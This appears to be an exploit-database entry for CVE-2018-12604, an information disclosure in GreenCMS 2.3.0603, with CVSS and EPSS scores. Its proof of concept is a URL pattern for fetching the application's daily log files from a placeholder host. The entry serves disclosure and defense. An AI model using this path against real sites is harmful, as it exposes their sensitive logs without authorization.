Vr_systemEDB-ID:44922GreenCMS 2.3.0603 - Information Disclosure
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.11 Low
EPSS
Percentile
95.2%
# Exploit Title: GreenCMS 2.3.0603 - remote obtain sensitive information
# Date: 2018-06-21
# Exploit Author: vr_system
# Vendor Homepage: https://github.com/GreenCMS/GreenCMS/
# Software Link: https://github.com/GreenCMS/GreenCMS/
# Version: GreenCMS 2.3.0603
# Tested on: windows 7
# CVE : CVE-2018-12604
# POC£ºhttp://site.com/Data/Log/year_month_day.log.
# Tested Link:
http://site.com/GreenCMS-beta/Data/Log/18_06_20.log
http://site.com/Data/Log/18_06_20.logRelated
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.11 Low
EPSS
Percentile
95.2%